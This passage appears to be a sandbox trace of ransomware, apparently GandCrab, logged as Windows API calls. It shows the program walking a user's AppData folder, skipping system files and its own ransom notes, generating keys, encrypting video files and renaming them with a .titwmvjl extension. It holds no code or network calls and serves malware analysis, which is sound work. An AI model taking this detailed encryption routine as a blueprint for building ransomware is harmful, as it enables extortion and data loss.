[0069.917] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0069.917] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0069.917] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0069.917] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0069.917] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0069.917] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0069.917] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.917] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0069.917] FindClose (in: hFindFile=0x5036f8 | out: hFindFile=0x5036f8) returned 1 [0069.918] CloseHandle (hObject=0x2bc) returned 1 [0069.918] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0069.918] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0069.918] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0069.918] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\TITWMVJL-DECRYPT.txt" [0069.918] lstrlenW (lpString=".titwmvjl") returned 9 [0069.918] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\TITWMVJL-DECRYPT.txt") returned 64 [0069.918] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.918] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 73 [0069.919] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\TITWMVJL-DECRYPT.txt") returned 64 [0069.919] lstrlenW (lpString=".txt") returned 4 [0069.919] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.919] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0069.919] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0069.919] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.919] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\TITWMVJL-DECRYPT.txt") returned 64 [0069.919] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\TITWMVJL-DECRYPT.txt") returned 64 [0069.919] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0069.919] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0069.919] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0069.919] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0069.919] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0069.919] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0069.919] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0069.919] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0069.919] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.919] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 0 [0069.919] FindClose (in: hFindFile=0x5034f8 | out: hFindFile=0x5034f8) returned 1 [0069.920] CloseHandle (hObject=0x2b4) returned 1 [0069.921] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0069.921] lstrcmpW (lpString1="aUzcWrREsGrojnF9hAS.mkv", lpString2=".") returned 1 [0069.921] lstrcmpW (lpString1="aUzcWrREsGrojnF9hAS.mkv", lpString2="..") returned 1 [0069.921] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="aUzcWrREsGrojnF9hAS.mkv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aUzcWrREsGrojnF9hAS.mkv") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aUzcWrREsGrojnF9hAS.mkv" [0069.921] lstrlenW (lpString=".titwmvjl") returned 9 [0069.921] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aUzcWrREsGrojnF9hAS.mkv") returned 61 [0069.921] VirtualAlloc (lpAddress=0x0, dwSize=0xba, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.921] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aUzcWrREsGrojnF9hAS.mkv.titwmvjl") returned 70 [0069.921] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aUzcWrREsGrojnF9hAS.mkv") returned 61 [0069.921] lstrlenW (lpString=".mkv") returned 4 [0069.921] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.921] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".mkv ") returned 5 [0069.921] lstrcmpiW (lpString1=".mkv", lpString2=".titwmvjl") returned -1 [0069.921] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.921] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aUzcWrREsGrojnF9hAS.mkv") returned 61 [0069.921] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aUzcWrREsGrojnF9hAS.mkv") returned 61 [0069.921] lstrcmpiW (lpString1="aUzcWrREsGrojnF9hAS.mkv", lpString2="desktop.ini") returned -1 [0069.921] lstrcmpiW (lpString1="aUzcWrREsGrojnF9hAS.mkv", lpString2="autorun.inf") returned 1 [0069.921] lstrcmpiW (lpString1="aUzcWrREsGrojnF9hAS.mkv", lpString2="ntuser.dat") returned -1 [0069.922] lstrcmpiW (lpString1="aUzcWrREsGrojnF9hAS.mkv", lpString2="iconcache.db") returned -1 [0069.922] lstrcmpiW (lpString1="aUzcWrREsGrojnF9hAS.mkv", lpString2="bootsect.bak") returned -1 [0069.922] lstrcmpiW (lpString1="aUzcWrREsGrojnF9hAS.mkv", lpString2="boot.ini") returned -1 [0069.922] lstrcmpiW (lpString1="aUzcWrREsGrojnF9hAS.mkv", lpString2="ntuser.dat.log") returned -1 [0069.922] lstrcmpiW (lpString1="aUzcWrREsGrojnF9hAS.mkv", lpString2="thumbs.db") returned -1 [0069.922] lstrcmpiW (lpString1="aUzcWrREsGrojnF9hAS.mkv", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0069.922] lstrcmpiW (lpString1="aUzcWrREsGrojnF9hAS.mkv", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0069.922] lstrcmpiW (lpString1="aUzcWrREsGrojnF9hAS.mkv", lpString2="KRAB-DECRYPT.html") returned -1 [0069.922] lstrcmpiW (lpString1="aUzcWrREsGrojnF9hAS.mkv", lpString2="CRAB-DECRYPT.html") returned -1 [0069.922] lstrcmpiW (lpString1="aUzcWrREsGrojnF9hAS.mkv", lpString2="KRAB-DECRYPT.txt") returned -1 [0069.922] lstrcmpiW (lpString1="aUzcWrREsGrojnF9hAS.mkv", lpString2="CRAB-DECRYPT.txt") returned -1 [0069.922] lstrcmpiW (lpString1="aUzcWrREsGrojnF9hAS.mkv", lpString2="ntldr") returned -1 [0069.922] lstrcmpiW (lpString1="aUzcWrREsGrojnF9hAS.mkv", lpString2="NTDETECT.COM") returned -1 [0069.922] lstrcmpiW (lpString1="aUzcWrREsGrojnF9hAS.mkv", lpString2="Bootfont.bin") returned -1 [0069.922] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aUzcWrREsGrojnF9hAS.mkv") returned 61 [0069.922] lstrlenW (lpString=".mkv") returned 4 [0069.922] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.922] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".mkv ") returned 5 [0069.922] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.922] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.922] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aUzcWrREsGrojnF9hAS.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\auzcwrresgrojnf9has.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0069.923] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.923] ReadFile (in: hFile=0x2b4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0069.923] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.923] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.924] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0069.924] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.924] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.924] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.925] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0069.925] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.925] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.925] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.925] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.925] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0069.926] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.926] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.926] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.926] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0069.926] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.926] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.926] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.926] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.927] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0069.927] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.927] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5032f8) returned 1 [0069.928] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.928] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0069.928] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.928] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259f130*=0x100) returned 1 [0069.928] GetLastError () returned 0x0 [0069.928] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.928] CryptDestroyKey (hKey=0x5032f8) returned 1 [0069.928] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.928] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.929] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.929] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0069.929] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.929] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5039b8) returned 1 [0069.929] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.929] CryptGetKeyParam (in: hKey=0x5039b8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0069.930] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.930] CryptEncrypt (in: hKey=0x5039b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259f130*=0x100) returned 1 [0069.930] GetLastError () returned 0x0 [0069.930] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.930] CryptDestroyKey (hKey=0x5039b8) returned 1 [0069.930] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.930] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.930] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0069.931] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0069.931] ReadFile (in: hFile=0x2b4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259f1dc*=0x13aeb, lpOverlapped=0x0) returned 1 [0069.938] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffec515, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.938] WriteFile (in: hFile=0x2b4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x13aeb, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259f1c0*=0x13aeb, lpOverlapped=0x0) returned 1 [0069.939] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.939] WriteFile (in: hFile=0x2b4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0069.941] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.945] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.945] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.945] CloseHandle (hObject=0x2b4) returned 1 [0069.948] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aUzcWrREsGrojnF9hAS.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\auzcwrresgrojnf9has.mkv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aUzcWrREsGrojnF9hAS.mkv.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\auzcwrresgrojnf9has.mkv.titwmvjl"), dwFlags=0x1) returned 1 [0069.948] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.949] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0069.949] lstrcmpW (lpString1="aZf9Wm.avi", lpString2=".") returned 1 [0069.949] lstrcmpW (lpString1="aZf9Wm.avi", lpString2="..") returned 1 [0069.949] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="aZf9Wm.avi" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aZf9Wm.avi") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aZf9Wm.avi" [0069.949] lstrlenW (lpString=".titwmvjl") returned 9 [0069.949] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aZf9Wm.avi") returned 48 [0069.949] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.949] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aZf9Wm.avi.titwmvjl") returned 57 [0069.949] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aZf9Wm.avi") returned 48 [0069.949] lstrlenW (lpString=".avi") returned 4 [0069.949] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.949] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".avi ") returned 5 [0069.949] lstrcmpiW (lpString1=".avi", lpString2=".titwmvjl") returned -1 [0069.949] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.950] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aZf9Wm.avi") returned 48 [0069.950] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aZf9Wm.avi") returned 48 [0069.950] lstrcmpiW (lpString1="aZf9Wm.avi", lpString2="desktop.ini") returned -1 [0069.950] lstrcmpiW (lpString1="aZf9Wm.avi", lpString2="autorun.inf") returned 1 [0069.950] lstrcmpiW (lpString1="aZf9Wm.avi", lpString2="ntuser.dat") returned -1 [0069.950] lstrcmpiW (lpString1="aZf9Wm.avi", lpString2="iconcache.db") returned -1 [0069.950] lstrcmpiW (lpString1="aZf9Wm.avi", lpString2="bootsect.bak") returned -1 [0069.950] lstrcmpiW (lpString1="aZf9Wm.avi", lpString2="boot.ini") returned -1 [0069.950] lstrcmpiW (lpString1="aZf9Wm.avi", lpString2="ntuser.dat.log") returned -1 [0069.950] lstrcmpiW (lpString1="aZf9Wm.avi", lpString2="thumbs.db") returned -1 [0069.950] lstrcmpiW (lpString1="aZf9Wm.avi", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0069.950] lstrcmpiW (lpString1="aZf9Wm.avi", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0069.950] lstrcmpiW (lpString1="aZf9Wm.avi", lpString2="KRAB-DECRYPT.html") returned -1 [0069.950] lstrcmpiW (lpString1="aZf9Wm.avi", lpString2="CRAB-DECRYPT.html") returned -1 [0069.950] lstrcmpiW (lpString1="aZf9Wm.avi", lpString2="KRAB-DECRYPT.txt") returned -1 [0069.950] lstrcmpiW (lpString1="aZf9Wm.avi", lpString2="CRAB-DECRYPT.txt") returned -1 [0069.950] lstrcmpiW (lpString1="aZf9Wm.avi", lpString2="ntldr") returned -1 [0069.950] lstrcmpiW (lpString1="aZf9Wm.avi", lpString2="NTDETECT.COM") returned -1 [0069.950] lstrcmpiW (lpString1="aZf9Wm.avi", lpString2="Bootfont.bin") returned -1 [0069.950] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aZf9Wm.avi") returned 48 [0069.950] lstrlenW (lpString=".avi") returned 4 [0069.950] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.950] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".avi ") returned 5 [0069.950] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.951] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.951] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\aZf9Wm.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\azf9wm.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0069.951] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.951] ReadFile (in: hFile=0x2b4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0069.952] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.952] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.952] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0069.953] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.953] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.953] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.953] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0069.953] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.953] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.954] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.954] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.954] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0069.954] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.954] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.955] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.955] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0069.955] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.955] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.955] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.955] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.955] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0069.956] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.956] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503338) returned 1 [0069.956] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.956] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0069.956] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.956] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259f130*=0x100) returned 1 [0069.957] GetLastError () returned 0x0 [0069.957] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.957] CryptDestroyKey (hKey=0x503338) returned 1 [0069.957] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.957] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.957] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.957] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0069.958] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.958] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503578) returned 1 [0069.958] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.958] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0069.958] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.958] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259f130*=0x100) returned 1 [0069.958] GetLastError () returned 0x0 [0069.958] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.958] CryptDestroyKey (hKey=0x503578) returned 1 [0069.959] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.959] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.959] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0069.959] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0069.959] ReadFile (in: hFile=0x2b4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259f1dc*=0x9c64, lpOverlapped=0x0) returned 1 [0069.965] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffff639c, 